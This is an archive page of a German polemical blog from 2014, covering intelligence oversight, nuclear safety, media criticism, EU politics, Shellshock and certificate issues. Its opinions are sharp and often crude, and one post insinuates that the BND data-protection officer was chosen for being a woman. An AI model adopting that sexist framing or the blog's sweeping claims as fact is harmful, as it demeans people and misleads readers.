[l] Was die Datenschutzbeauftragte des BND da so im NSA-Ausschuss gesagt hat, war im Großen und Ganzen ein Totalschaden für den BND. Und sie hat es noch schlimmer gemacht, indem sie systematisch versucht hat, die positiven Aspekte rauszustellen, aber die gab es halt nicht wirklich. Und so blieb als Eindruck zurück, der positive Teil sei, dass sie Termine beim BND-Präsidenten kriegt, der sie dann aber inhaltlich überstimmt und ihre Bedenken wegwischt. Wenn sie sich doch mal durchsetzt, wie z.B. bei einer Expire-Löschroutine für alle Datenbanken, dann kommt später raus, dass die "in Einzelfällen nicht ordnungsgemäß abgearbeitet wurden".
Oh und bei den heißen Eisen, z.B. der "Glasfasererfassung" u.a. am DE-CIX, da war sie dann gar nicht erst eingebunden.
Die kriminelle Energie der Geheimdienste kennt keine Grenzen. Zumachen, abreißen, und alle in den Knast.
Update: Oh und noch ein Detail:
Auf die IT-Sicherheit achte im BND ein gesonderter großer Bereich, führte die Zeugin weiter aus. Sie bat daher um Verständnis, dass sie vom möglichen Ausnutzen von Zero-Day-Exploits keine Kenntnis und das Wort auch gerade zum ersten Mal gehört habe. Sie selbst sei "technisch nicht vorgebildet" und könnte daher etwa mit Quellcode nichts anfanngen
Das muss ja ein langwieriger Auswahlprozess gewesen sein, bis sie eine Datenschutzbeauftragte gefunden haben, die noch nie das Wort 0day gehört hat. Ob das deshalb eine Frau geworden ist, weil die CSU-Wähler beim BND dachten, dann sei gewährleistet, dass die nichts kann und nicht aufmuckt? Dafür hat die aber getan was sie konnte, muss ich ja mal anerkennen. Es wäre noch schöner gewesen, wenn sie das von sich aus an die Medien geleakt hätte, oder von mir aus an den Bundesdatenschutzbeauftragten, als das noch nicht diese furchtbare Voßhoff war.

Wed Oct 8 2014

[l] Mir hat vorhin jemand eine Mail geschickt, deren Implikationen recht gruselig sind. Der ist mit seiner Familie rumgereist und hat Fotos gemacht und die am Ende bei Google hochgeladen. Google hat eine Funktion "Make a story", die daraus dann eine flashige HTML5-Webseite mit Seitenscrolling macht, wo die Fotos zeitlich aneinander montiert werden, aber dazwischen werden so Kartenausschnitte eingeblendet mit Pfeilen, von wo nach wo man gereist ist.
Das Gruselige daran: Die Fotos hat der Mann mit seiner Kamera gemacht, ein Modell ohne GPS. Google konnte den Fotos also nicht ansehen, wo sie gemacht wurden. Der Mann hatte allerdings sein Mobiltelefon dabei.

Mon Oct 6 2014

[l] Aus der beliebten Kategorie "bei UNS ist Kernkraft SICHER", heute: Britisches Atomkraftwerk in Schottland muss wegen Rissen in ihren Graphit-Blöcken wohl doch eher bald zugemacht werden. Das war eh geplant, aber der Betreiber EDF (EDF steht für Électricité de France, auch DAS noch!) wollte sie noch bis 2023 oder noch länger am Netz behalten. Der eine oder andere wird gerade Schweißausbrüche kriegen, denn Graphit als Moderator hat einige inhärente Probleme, die bei Tschernobyl mitgeholfen haben, und damals war es in der Krisen-PR der Nummer 1 Talking Point, dass Graphitreaktoren ja Scheiße seien und im fortschrittlichen Westen niemals nie nicht eingesetzt würden, das tun nur die verzweifelten Nichtskönner-Russen!1!!
Early nuclear reactors around the world all used graphite, but only the British and the Soviet Union persevered with the technology.
Und die Briten, wie sich rausstellt.
Ich zitiere mal ein bisschen:
Years of neutron irradiation have caused the graphite to shrink, but because the bombardment does not spread evenly through the brick material, the rates of recession are also irregular. This causes tension and eventually cracking.
Lustigerweise ist auch EDF klar, dass man das nicht schönreden kann, daher versuchen sie es mit der "das ist bloß ein fauliger Apfel, der Rest des Korbs ist OK"-Strategie:
Experts at EDF maintain that the new cracks are from an anomalous group of bricks and that the reactors are well within the safety case, which allows for the general cracking of up to 300 bricks (10%) before the limit is breached.
Naja, dann tauscht man die Graphitblöcke halt aus, werdet ihr euch jetzt denken.
The tubular graphite bricks, each about a metre high, moderate nuclear reactions and are essential to safe operation. However, they cannot be replaced.
Nope. Na gut, werdet ihr euch jetzt denken, bei sowas baut man doch einen Sicherheitsfaktor mit ein. Ein paar Blöcke, das wird das Design ja wohl abkönnen.
EDF was granted permission by the regulator in the summer to relax its graphite weight-loss limit at the Dungeness reactor in Kent from 6.2% to 8% after it came close to breaching the original safety margin.
Keine weiteren Fragen, euer Ehren.
Es heißt ja, dass auch dieses Atomkraft-Problem eine der Treibkräfte hinter dem schottischen Unabhängigkeitsreferendum waren. Na SO ein Zufall, dass dieser Bericht erst kurz danach rauskommt.
Update: Ach, auch lustig: Zum Vergleich ein Artikel über das selbe Thema, auch bei der BBC, aber in der Schottland-Sektion. Das ist gefühlt jedes zweite Wort "safe" und der ganze Artikel besteht aus 20 Wiederholungen der Beteuerung, dass das alles schon OK ist. (Danke, Magnus)
[l] Video-Tipp: John Oliver wendet sich Civil Forfeiture zu. Civil Forfeiture hatte ich hier mal angesprochen, aber John Oliver macht daraus ein Kunstwerk. Sehr erfreulich, übrigens, dass das überhaupt auf Youtube ist, und auch noch hochgeladen von HBO selbst. Das ist ja eigentlich ein Pay-TV-Sender, die normalerweise nicht so progressiv sind, wenn es um Youtube geht. Die haben einen eigenen Streaming-Service, aber den kann man selbst in den USA nur abonnieren, wenn man auch deren Kabel-TV bezieht. Bei John Oliver haben sie aus Aufklärungsgründen (denke ich mal) eine Ausnahme gemacht, und die solltet ihr alle nutzen, solange es sie gibt. Eine Sendung großartiger als die anderen.

Sun Oct 5 2014

[l] Oettinger sucht händeringend nach etwas, das er sagen könnte, um seinen ramponierten Ruf aufzubessern. Und da fiel die Wahl auf "Datenschutz". Hey, die doofen Bürger da draußen merken sicher nicht, dass er noch nie was mit Datenschutz gemacht hat und das auch jetzt nicht sein Ressort ist. Ein Glück, dass die Wähler immer so doof sind. Wenn die vor der Wahl mal geguckt hätten, was die "Konservativen" für einen Track Record haben, wären die nicht im Parlament vertreten gewesen.

Wed Oct 1 2014

[l] Die Tagesschau legt nochmal nach:
Und nun stellt sich heraus, dass wir vor fünf Monaten doch einmal gravierend danebengelegen haben.
NEIN! DOCH!! OH!!!
Aber fürchtet euch nicht, denn der Schuldige ist schon ausgemacht.
Ein aufmerksames und kritisches Publikum ist wichtiger Bestandteil unserer Qualitätskontrolle.
Die Qualitätskontrolle hat versagt, und die Qualitätskontrolle, das seid ihr!
[l] Die Tagesschau gibt vollständiges Komplettversagen in der Ukraine-"Berichterstattung" zu. Ich zitiere mal:
Mit dem Wissen von heute hätten wir manchen Akzent anders gesetzt und manche Formulierung anders gewählt (hinterher ist man halt schlauer). Möglicherweise sind wir zu leicht dem Nachrichten-Mainstream gefolgt. Vielleicht hätten wir rechte Gruppierungen in der Ukraine früher thematisieren sollen. Der falsche Hubschrauber war sehr ärgerlich, aber wir sind damit wenigstens richtig (weil transparent) umgegangen. Wir hätten uns bei der Formulierung “OSZE-Beobachter” eher eine andere Formulierung wählen können. Vielleicht haben wir die russischen Interessen zu wenig für den deutschen Zuschauer “übersetzt”. Wir hätten evtl. die NATO-Position noch kritischer hinterfragen können.
Leider ziehen sie am Ende den Schluss, doch alles richtig gemacht zu haben. Und zwar wegen des "geistig behindertes Kind in der Grundschule"-Argumentes:
Wir haben stets nach bestem Wissen und Gewissen sowie sorgfältiger Recherche berichtet.
Aha? Besser könnt ihr einfach nicht, sagt ihr? Das ist ja tragisch.
Es gibt keinen Grund, sich für Fehler zu entschuldigen oder in der Berichterstattung nun gar “gegenzusteuern”.
Aber nicht doch, mein Herr! Natürlich nicht! Wo kämen wir da hin! Die Tagesschau hat schließlich auch in Zukunft einen Nato-Propaganda-Auftrag. Ich amüsiere mich ja besonders über das "noch kritischer hinterfragen können". Wie, NOCH kritischer? Geht das überhaupt?!?!

Mon Sep 29 2014

[l] Die "Computerbild" hat über das Iphone berichtet, 20 Seiten mit Fülltext gefüllt, und völlig überraschend am Ende Apple zum Testsieger gemacht. Das Übliche, werdet ihr euch jetzt vielleicht denken. Die Presse steckt halt bis zum Anschlag im Hintern von Apple. Aber es stellt sich raus: Nein, noch nicht tief genug. Die "Journalisten" der "Computerbild" haben es nämlich gewagt, in ihrem Blindtext zwischen der Werbung einen Hinweis auf die Biegsamkeit des Iphones unterzubringen. Die werden sich gedacht haben, hey, den Text liest doch eh keiner. Stimmt aber nicht. Apples Anwälte haben den Text gelesen. Und haben bei Axel Springer angerufen und den verdutzten "Journalisten" dort erklärt, dass sie noch nicht tief genug drin waren, der Flughafen-Nacktscanner zeigte noch was an. Daher sind sie jetzt auf der Schwarzen Liste, werden nicht mehr von Apple eingeladen und kriegen keine Geräte mehr zugeschickt.
Wer hätte das gedacht, dass ausgerechnet Axel Springer eines Tages die IT-Publikation rausbringen würde, die es als einzige wagt, sowas wie Kritik an Apple anzudeuten.
Schöner Präzedenzfall von Apple, auch. Ist wie bei der Merkel. Wenn die mal Kritik an den Amis äußert, dann kriegt sie auch gleich ein paar Konditionierungs-Peitschenhiebe und rückt noch ein Stück tiefer in den Dünndarm vor.
Das ist wie wenn man ein Tier zähmt.
Ich delektiere mich ja an den Tränen des "Computerbild"-"Redakteurs", der dann verwundert ist, was Apple denn hat, wir haben denen doch den Testsieg gegeben!1!! Ja, nee, so läuft das nicht. Da waren noch Spuren von Fakten in dem Artikel nachweisbar. Dass man DAS bei Axel Springer noch erklären muss, dass das ein Problem ist!1!!
[l] Ich habe heute einen lustigen Corner Case in GNU tar 1.28 gefunden:
```
% tar cf t.tar dumpcache dumpcache
% tar tvf t.tar
-rwxr-xr-x leitner/users 12216 2014-09-29 10:16:25 dumpcache
-rwxr-xr-x leitner/users     0 2014-09-29 10:16:25 dumpcache link to dumpcache
```
Das zweite Mal tut GNU tar nicht das file rein sondern einen hard link auf sich selbst. Das hat in meinem tar.c Ärger gemacht, weil der bei hard links erstmal unlink() auf das Ziel gemacht hat, dann link(). Muss man auch erst mal drauf kommen. Ob das so geplant war? Scheint mir eher ein Artefakt des hard link handlings zu sein, wahrscheinlich eine Hashtabelle mit den bisher gesehenen struct stat oder sowas.

Thu Sep 25 2014

[l] Bug des Tages: Der Bash-Fix ist nicht genug und Busybox auf Android ist wohl auch betroffen.
Update: Und um die Apokalypse perfekt zu machen, gab es auch in der von Chrome und Firefox verwendeten SSL-Library einen RSA-Signatur-Bypass. Ja super! Sonst noch was?
Update: Ah, Busybox ist doch nicht betroffen, höre ich gerade, sondern nur Geräte mit Cyanogenmod, die bash statt der Shell von Busybox nehmen.
Update: Es gibt schon die erste Malware damit.
Update: Mein Freund Andreas hat mal einen Patch gemacht, der das ganze kaputte Feature wegoperiert. Wer will schon Shell-Funktionen im Environment haben!? Das ist relativ zu bash-4.3.24 (nicht .25).

Tue Sep 23 2014

[l] Die UBS fühlt sich verfolgt und will vor den EU-Menschenrechtsgerichtshof. Und zwar werden sie von den fiesen Franzosen verfolgt, die ihnen wegen jahrelanger systematischer Beihilfe zur Steuerhinterziehung das Hinterlegen einer Kaution in Höhe von 1,1 Milliarden Euro aufgedrückt haben. Ich würde da normalerweise jetzt ein paar gehässige Kommentare bloggen, aber der Tagesanzeiger hat das schon für mich getan. Money Quote:
Dabei hatte die Bank doch nur ihre Arbeit gemacht! Die UBS hat sich mit komplizierten Trust-Konstrukten herumgeschlagen, undercover Auslandsreisen getätigt und sogar eine aufwendige Parallelbuchhaltung geführt (zumindest gemäss Vorwürfen aus Frankreich, die die UBS aber bestreitet). Sie hat gewissermassen keine Mühen gescheut, um die vom französischen Steuervogt verfolgten Kunden zu betreuen.
MWAHAHAHA (Danke, Thomas)
[l] Heise titelt heute, Microsoft habe sein Security-Team zerschlagen. Da kann ich zufällig ein Wort mitreden, weil ich mit denen häufiger zusammengearbeitet habe. Es ist richtig, dass die Abteilung Trustworthy Computing aufgelöst wird, und dass einige Leute gefeuert wurden. Das Feuern funktioniert in großen US-Firmen so, dass sie bei Entlassungen bemüht sind, einen gewissen Prozentsatz aus allen Abteilungen zu feuern, damit sie am Ende sagen können, seht her, das hat alle betroffen; auch die Geschlechter und Nationalitäten sind dann statistisch proportional betroffen. Was die da inhaltlich gemacht haben, bleibt aber bestehen, nur halt organisatorisch als Teil von anderen Abteilungen. Das heißt aber auch, dass die insgesamt weniger Einfluss haben, was ich für einen Fehler halte.
Ich erwähne meinen beruflichen Kram hier normalerweise nicht, aber wenn der Chef von TwC meinen Namen tweetet, dann kann ich mal eine Ausnahme machen fand ich :-) Ein US-Kollege, der damals auch in Stunde 0 mit dabei war, hat diese Gedanken dazu gebloggt, denen ich mich nostalgisch anschließen möchte. Microsoft hat immer viel Häme gekriegt für ihre Softwarequalität, aber die haben unter dem Strich für sich und die ganze Industrie mehr geleistet als alle Regierungen zusammengenommen — selbst wenn man die Unsicherheitssteigerungsleistungen der Geheimdienste rausrechnet.
Die Security-Industrie hat insgesamt schon was bewegt in den letzten 10 Jahren, auch wenn sich das immer wie ein Kampf gegen Windmühlen anfühlt. Ein Gutteil des Hebels in großen Firmen kam daher, dass man sagen konnte, schaut her, selbst Microsoft hat es geschafft, dafür einen Prozess zu etablieren!
Nun kann man natürlich sagen, hey, Microsoft hat immer noch kritische Fehler in ihrem Code. Die müssen immer noch einmal im Monat Patch-Tag machen und da sind immer wieder furchtbare Dinge bei. Stimmt. Aber bei Microsoft wissen wir immerhin, dass sie selber nach Fehlern bei sich suchen und die aktiv auszumerzen versuchen. Bei anderen wissen wir, dass sie darauf warten, dass jemand von außen Fehler meldet, und dann fixen sie sie — vielleicht.

Tue Sep 16 2014

[l] Der Blog-Server hat gerade massiven Paketverlust auf der Anbindung. Soweit ich das sehen kann, liegt die Schuld außerhalb des Rechners und auch außerhalb des Rechenzentrums. Ich habe ein Ticket aufgemacht.
Update: Scheint wieder gut zu sein.

Wed Sep 10 2014

[l] Die neue EU-Kommission ist ein veritables Gruselkabinett, und das meine ich selbst nach Einpreisung der Tatsache, dass Juncker ihr Chef ist. Auffällig ist, wie die ARD bemüht ist, die Kritik auf einige wenige Kandidaten zu beschränken, wie es halt gerade auf Merkel-Linie passt. Z.B. den Franzosen. Dass das Kabinett aus Neoliberalen Überzeugungstätern besteht — egal. Zu Öttinger haben sie sogar die Stirn zu sagen, er habe auf dem Energiesektor überzeugt, sei einer der stärkeren Kommissare gewesen. Bitte was?!
Der niederländische Außenminister hat sich offenbar durch MH17 in das Amt geoderflut-schrödert. Ansonsten ist der dadurch aufgefallen, nationale Entscheidungen der Niederlande an die EU zu delegieren, damit die Regierung dann eine Merkel pullen kann ala "da können wir auch nichts mehr machen, diese Direktive kommt aus Brüssel!1!!"
Vizepräsident der Kommission wird der Este Andrus Ansip, ein Neocon und ACTA-Fanboy. Valdis Dombrovskis aus Lettland könnte sein Zwilling sein, äußerlich wie von den politischen Positionen her. Kristalina Georgiewa soll sich um den Haushalt kümmern (im Sinne von Budget) und kommt von der Weltbank, was sie in meinem Weltbild sofort disqualifizieren sollte. Sie war bis zuletzt für humanitäre Hilfe zuständig und hat sich um Haiti gekümmert, aber bei Lampedusa hat es nur für ein paar Phrasen gereicht.
Alenka Bratusek aus Slowenien ist so unhaltbar, dass selbst die ARD nichts positives über sie gefunden hat. Autsch. Der Franzose Pierre Moscovici soll sich um Wirtschaft, Finanzen und Steuern kümmern. Das hat schon ein Geschmäckle, aber wer kann da schon den ersten Stein werfen. Schäuble?
Für das Wettbewerbsressort soll die dänische Wirtschaftsministerin Margrethe Vestager zuständig sein, eine Priesterin, die später u.a. für Bildung zuständig war. Vielleicht ist das in Dänemark weniger übel als es jetzt für mich klingt. In Dänemark scheint sie so eine art Lichtgestalt zu sein unter den ganzen Verlierern, der Lebenslauf liest sich, als habe da jemand aus dem Drehbuch von Borgen abgeschrieben. Hmmmmm.
Cecilia Malmström ist IMMER NOCH EU-KOMMISSARIN. Un-fass-bar. Wieviel muss man eigentlich falsch machen, um da rauszufliegen? Und DIE läuft da unter "liberal"! Zuständig soll sie Handelskommissarin werden. Na dann kann ja nichts mehr schiefgehen. *stöhn*
Die Tschechin Vera Jourova soll für Justiz, Verbraucherschutz und Geschlechtergerechtigkeit (WTF, wieso nicht auch noch für Gurkenkrümmung?) zuständig sein. Über sie konnte ich nicht viel finden. Schaunmermal.
Die Ressorts Beschäftigung, Soziales und Mobilität soll die Belgierin Marianne Thyssen übernehmen, eine Karrierejuristin, die ihr Leben in Parteien und Verwaltungen verbracht hat. Man findet über sie vor allem, bei welchen Organisationen sie irgendwelche belanglosen Pöstchen inne hat.
Überhaupt riechen die Lebensläufe und Wikipedia-Seiten der Kandidaten alle frisch gesäubert und porentief rein. Und kurz. Es wirkt ein bisschen wie "wenn du nichts Gutes zu sagen hast, sag lieber gar nichts".
Das Bild rundet sich mit Tibor Navracsics aus Ungarn ab, der dort bei der Fascho-Partei Fidesz mitläuft. Ja super, genau so jemanden will man doch als EU-Kommissar haben! Oh und ein "Euroskeptiker" als Kandidat aus Großbritannien, das passt auch wie Arsch auf Eimer. Das war ein Deal, damit Cameron was vorzuweisen hat bei dem Referendum 2017, ob UK in der EU bleiben soll. Eine Schande. Zuständig sein soll er für — na klar! — Finanzstabilität, Finanzdienste und Kapitalmarkt. Denn wen sonst würde man für die Regulierung der Kapitalmärkte zuständig sein lassen als einen Euroskeptiker aus England!1!!
Na und Oetting als Digitalkommissar hatten wir ja schon.
Das ist alles so eine Farce. Mehr als eine Farce. Das ist ein Stinkefinger. Der Stinkefinger von Juncker in Richtung der jungen Generationen (d.h. der unter 60). Der Prozentsatz der Nichtwähler ist unter den Alten deutlich geringer als unter den Jüngeren. Hier haben also die Greise mit Juncker einen der Ihren zum Chef der EU-Kommission gemacht, und der zeigt jetzt dem Rest der Wähler offen den Stinkefinger. Damit die einsehen, dass Widerstand hoffnungslos ist, und auch in Zukunft nicht wählen gehen.

Sun Sep 7 2014

[l] Kennt ihr den schon? Die Polizei stoppt euch auf der Straße, nimmt euch euer Bargeld weg, und ihr müsst dann beweisen, dass das aus legalen Quellen kam? Das ist nicht nur seit Miami-Vice-Zeiten Gesetzgebung in den USA sondern wird auch zunehmend so gemacht. Kleine Statistik dazu:
There have been 61,998 cash seizures made on highways and elsewhere since 9/11 without search warrants or indictments through the Equitable Sharing Program, totaling more than $2.5 billion. State and local authorities kept more than $1.7 billion of that while Justice, Homeland Security and other federal agencies received $800 million. Half of the seizures were below $8,800.
o_O
Only a sixth of the seizures were legally challenged, in part because of the costs of legal action against the government. But in 41 percent of cases — 4,455 — where there was a challenge, the government agreed to return money. The appeals process took more than a year in 40 percent of those cases and often required owners of the cash to sign agreements not to sue police over the seizures.
Das ist die Antwort der Sherriffs darauf, dass die Kommunen pleite sind. Na dann beschaffen wir halt Geld!1!!

Fri Sep 5 2014

[l] Mit aktuellen Firefox Beta-Versionen kommt man nicht mehr per SSL auf blog.fefe.de. Da kommt eine Terrorpanikwarnung, das Zertifikat sei ungültig, selbst wenn man das cacert-Cert bei sich lokal als vertrauenswürdig eingepflegt hat. Grund:
The certificate is not trusted because it was signed using a signature algorithm that was disabled because that algorithm is not secure.
(Error code: sec_error_cert_signature_algorithm_disabled)
Das bezieht sich vermutlich auf das MD5, das cacert verwendet, um ihren Root-Key damit zu hashen. Es gibt auch nichts, was ich dagegen tun könnte, das ist ein Problem von cacert.
Ich finde es gelinde gesagt überraschend, dass Firefox, die seit gefühlt vorgestern überhaupt erst TLS 1.2 sprechen, jetzt solche Dinger bringen. Aber inhaltlich haben sie Recht. Zertifikate, bei denen in der Kette irgendwo MD5 auftaucht, darf man nicht mehr akzeptieren. Eigentlich schon länger nicht mehr.
Die gute Nachricht ist: Das Problem ist lösbar. Mozilla hat das vor ein paar Jahren angesagt, und cacert hat eine neue Signatur unter ihrem Root-Zertifikat gemacht. Ob ihr betroffen seid, hängt also davon ab, wann ihr die Zertifikate bei euch lokal eingepflegt habt. Und ihr könnt das Problem jetzt lösen, indem ihr die cacert-Zertifikate rausschmeißt und neu installiert.
Update: Hmm, nee, so einfach ist das nicht. Einige cacert-Sites sind mit dem einen Key signiert, der sich so reparieren lässt, einige (zu denen auch blog.fefe.de gehört) sind mit dem anderen Key signiert und gehen auch nach Neueinspielen der Zertifikate noch nicht. Ich guck mal, ob ich da was tun kann.
Update: Ich habe den Unterschied zwischen meinem Blog und der anderen Site, bei der es nach Zertifikatsupdate geht, identifiziert. Mein Blog ist mit dem Class1-Key signiert, die andere Site mit dem Class3-Key. Den kann man auch separat in den Trust Store einpflegen, dann spielt es keine Rolle mehr, ob das Class1-Root-Zertifikat den Class3-Key nur mit MD5 signiert hat. Allerdings scheint das ein politisches Problem zu sein, kein technisches, denn man kann das nicht auswählen, ob man Class1 oder Class3 haben will. Für Class3 muss man "Assured Member" sein. Bin ich nicht. Will ich auch nicht werden. Damit ist cacert dann wohl zukünftig ungeeignet.

Thu Sep 4 2014

[l] Ich warte (mit einigen Kumpels) seit einigen Jahren darauf, dass irgendwann rauskommt, dass die Wavies Recht haben. Die Spinner, die sich von orbitalen Mikrowellen-Gehirnwäschesatelliten und HAARP gedankenkontrolliert wähnen, oder Schmerzen von Handystrahlung kriegen. Denn wenn die Recht haben, dann können wir alle einpacken. So viel Scheiß wird heute per Funk gemacht. Wenn rauskommt, dass das gesundheitsschädigend ist, kann unsere Gesellschaft als solche ziemlich zumachen. Daher ist das so ein apokalyptischer Witz, dass wir uns gelegentlich gegenseitig warnen, dass eines Tages herauskommen wird, dass die Wavies Recht hatten.
Heute sind wir dem schon mal bedrohlich näher gekommen: Falsche Handymasten gefunden, die "wohl dazu dienen, Smartphones abzuhören". Au ja! Dann kann es ja nicht mehr lange dauern, bis marodierende Wavie-Horden über das Land ziehen und die ganzen Handymasten absägen. Wenn es nicht alles so traurig wäre, wäre es echt großartige Unterhaltung.

Mon Sep 1 2014

[l] In Sachen Ukraine hat sich gerade der Wind gedreht. Putin hat sich einmal laut geräuspert, und schon sagt die Nato an, "Militärisch ist der Konflikt für Kiew bereits verloren". Und westliche Medien (in diesem Fall geht das zurück auf La Repubblica aus Italien) berichten, Putin habe (EU-Präsidenten) Barroso am Telefon gesagt, "Wenn ich will, nehme ich Kiew in zwei Wochen ein".
Vor ein paar Tagen hieß es noch, Putin schickt nur ein paar Mann dahin, damit Kiews Durchmarsch ins Stocken kommt. Und jetzt klingt das plötzlich so, als hätten die Russen mal eben die ukrainische Armee plattgemacht. Gut, dass sie das im Zweifel könnten, daran bestand nie Zweifel. Aber es erscheint nicht die schlaue Strategie zu sein an der Stelle. Wie Colin Powell schon Bush über den Irak sagte: You break it, you own it, you fix it. Gut, Russland hat eh schon freiwillig weitgehende Verantwortungen übernommen, als sie den Gaspreis nicht hochsetzten. Da war eine stabile Pufferzone gegen die Nato halt wichtiger als das Geld.
Tja und so sieht das nach einem Krieg aus, bei dem mal wieder alle verloren haben. Die Ukraine, weil sie in Trümmern liegt, hohe Schulden hat, eine illegitime Putschistenregierung hat und noch mehr Souveränität an die Russen abgeben muss. Die Russen, weil sie jetzt für den Trümmerhaufen zuständig sind. Und der Westen, weil er keines seiner Ziele erreicht hat. Oh und zum Abschluss schießen sich Westen und Russland mit diesen Sanktionen nochmal jeweils selbst in den Fuß. Ganz großes Slapstick-Kino.

Sat Aug 30 2014

[l] Schlagzeile des Tages: Abgemagerter Häftling stirbt in JVA Bruchsal. (Danke, Marius)

Mon Aug 25 2014

[l] Urlaub in England gemacht? Urlaubsbilder nichts geworden? Kein Problem! Da gibt es jetzt einen tollen neuen Service! (Danke, Jan)

Tue Aug 19 2014

[l] Ihr habt ja bestimmt vom IT-Sicherheitsgesetz gehört, dass unser Innenminister da gerade mit großem Tamtam durchs Dorf treibt. Und ihr werdet euch bestimmt gedacht haben: Hmm, De Maiziere zum Thema Hacken ist eine Geschichte voller Missverständnisse!1!! Das kann doch nur voll in die Hose gehen? Wo ist der Pferdefuß?
Nun, liebe Leser, das will ich gerne aufklären: Die Kohle aus dem neuen IT-Sicherheitsgesetz fließt in den "Verfassungsschutz". Ja, der Verfassungsschutz! Die, die wie kaum eine andere Behörde für das Gegenteil von Sicherheit stehen! Die, die den Ku-Klux-Klan Deutschland, den NSU und andere verfassungsfeindliche Organisationen entweder selbst gegründet und/oder jahrelang per V-Mann-Spende am Leben gehalten haben, ausgerechnet die werden jetzt nicht zugemacht sondern kriegen noch neue Planstellen dazu! Und dann nennen sie das auch noch Sicherheitsgesetz!
Wenn das nicht unsere Steuergelder wären, wäre es fast eine schöne Aktion zur Monty-Python-Abschlußtour.
Oh, einen noch. Falls jemand dachte, hey, der Verfassungsschutz ist furchtbar, aber immerhin sind sie noch nicht mit Trojanern in der Hand ertappt worden, wie das BKA! Für den habe ich eine schlechte Nachricht:
Das Bundesinnenministerium möchte mit seinem jetzt veröffentlichten Referentenentwurf für ein IT-Sicherheitsgesetz neben dem Bundesamt für Sicherheit in der Informationstechnik (BSI) und dem Bundeskriminalamt (BKA) auch das Bundesamt für Verfassungsschutz (BfV) ausbauen.
Business as usual!
Wer sich jetzt wundert, dass der Zoll und BND nicht auch noch einen Geldregen kriegen: Der BND untersteht dem Kanzleramt, der Zoll dem ~~Justiz~~Finanzministerium. Der Referentenentwurf kommt aus dem Innenministerium. Die geben in ihren Gesetzesentwürfen natürlich nur sich selbst Geld, nicht anderen Ministerien. Denn darum geht es hier. Geld her, egal wie dümmlich der Vorwand auch ist.
Update: Vielleicht sollte ich auch auf inhaltliche Aspekte eingehen. Nur so der Vollständigkeit halber. Firmen müssen jetzt Hackerangriffe melden, aber a) nur "den Behörden", nicht der Bevölkerung, und b)
können sie das anonym tun, solange es keine Störungen oder Ausfälle gibt
Und wer soll das schon prüfen oder im Nachhinein überhaupt noch sagen können, ob einer der vielen Ausfälle auf Hackerangriffe zurückzuführen war oder nicht.
An dieser Stelle sei mir erlaubt, kurz darauf hinzuweisen, wieso die Idee "Hackerangriffe müssen gemeldet werden" überhaupt auf dem Tisch lag. Damit Firmen und Behörden diese Peinlichkeit vermeiden wollen. Das soll einen Anreiz schaffen, die Infrastruktur robust und sicher zu machen. Dafür gibt im Moment niemand wirklich Geld aus, weil es betriebswirtschaftlich kurzfristig mehr Profit bringt, wenn man es in Kundenacquise steckt. Diese zentrale Idee wird also mit diesem Gesetzesentwurf komplett ad absurdum geführt. Ursprünglich ging die Idee ja noch weiter, die Firmen hätten auch alle potentiell betroffenen Kunden jeweils individuell in Kenntnis setzen sollen. Damit die Firma befürchten muss, die Kunden laufen wenn.
Oh und wieso betrifft das eigentlich nur Firmen und nicht auch Behörden? Und wieso nur kritische Infrastruktur, nicht auch ganz normale Infrastruktur? Wer definiert eigentlich, welche Infrastruktur kritisch ist und welche nicht?
Update: Ich finde übrigens, wenn man da richtig Anreiz schaffen will, muss man auch gleich gesetzlich ein Sonderkündigungsrecht schaffen, wenn eine Firma beim Schlampen erwischt wird. Und zwar nicht nur für die betroffenen Kunden, für alle Kunden. Was glaubt ihr, wie eilig es die Knebelvertrag-Telcos plötzlich hätten, nie wieder gehackt zu werden!

Mon Aug 4 2014

[l] Bilfinger löst Roland Koch ab. Bilfinger hatte unter Koch zwei Gewinnwarnungen in Folge raushauen müssen und sieht das als Maßnahme zur "Vertrauensbildung".
Was soll das werden, Herr Koch? Wollen Sie den Mehdorn out-mehdornen?
Hey, ich hörte, bei Air Berlin ist ein Posten frei! Oder wie wäre es mit der Elbphilharmonie? Ich hörte, da wird ein Mann Ihres Formates gebraucht.
Oder wir geben die Elbphilharmonie an den Mehdorn und der Koch macht BER.
Ich finde ja auch geil, was der Koch mit Bilfinger gemacht hat.
Nachdem der Konzern wegen seiner Verwicklungen in eine Bestechungsaffäre in Nigeria mehr als 23 Millionen Euro Strafe gezahlt hatte, war im Mai zuletzt bekannt geworden, dass Bilfinger wesentliche Teile seines Baugeschäfts abstoßen will.
Bilfinger, ein Baukonzern, will sein Baugeschäft abstoßen? Das ist eine Idee, auf die kann auch echt nur ein richtiger Visionär kommen. Und man sieht so schön Kochs Handschrift! Unter Koch hat ja auch Hessens Steuerfahndung das Steuerfahnden-Business abgestoßen.

Fri Aug 1 2014

[l] The Independent zitiert aus dem PR-Handbuch der isrealischen Armee. Das ist besonders spannend, weil es von einem Amerikaner gemacht wurde, der sonst Wahlkampf für die Republikaner macht. Der hat das gemacht, wie man Wahlkampf macht: sich aus den verschiedenen Zielgruppen Vertreter eingeladen, und an denen Talking Points und Formulierungen durchprobiert, und dann geguckt, welche am besten funktionieren. Die Details sind hochinteressant, finde ich. Beispiel:
For example, the study says that "Americans agree that Israel 'has a right to defensible borders'. But it does you no good to define exactly what those borders should be. Avoid talking about borders in terms of pre- or post-1967, because it only serves to remind Americans of Israel's military history. Particularly on the left this does you harm. For instance, support for Israel's right to defensible borders drops from a heady 89 per cent to under 60 per cent when you talk about it in terms of 1967."
Fragen nach dem Recht zur Rückkehr der Flüchtlinge in ihre Heimat soll man am besten ganz aus dem Weg gehen, weil alle Antworten die Zielgruppen an die Rhetorik der Rassentrennung in den USA oder Südafrika erinnern, und die Assoziation ist Gift für die Umfragewerte. Lösung: Man soll es als "Forderung" der Palästinenser bezeichnen. Niemand mag Forderungen, das klingt schon voll unsympathisch.

Thu Jul 31 2014

[l] Hier ist einer, der ist so großartig, der ist einer für die Geschichtsbücher. Setzt euch mal stabil hin. Das ist der Hammer.
Stellt euch mal vor, das Parlamentarische Geheimdienst-Kontrollgremium der USA klagt öffentlich die Geheimdienste an, sie hätten sich in ihre Rechner gehackt und dort Daten gelöscht. So geschehen im März. Da fragt man sich ja schon, was die da für Beweise haben, um sich so weit aus dem Fenster zu lehnen. Was ist da passiert? War das ein Fall von "Hey, hast du BEWEIS.DOC gesehen? Ich dachte, das war auf der Freigabe!" "Nee, das hast du bestimmt versehentlich gelöscht." "Ich lösche doch keine Beweise! Das muss die CIA gewesen sein!1!!" ?
So hab ich mir das jedenfalls ausgemalt damals. Und jetzt *trommelwirbel* gibt die CIA zu, sich in die Rechner gehackt und Beweise gelöscht zu haben.
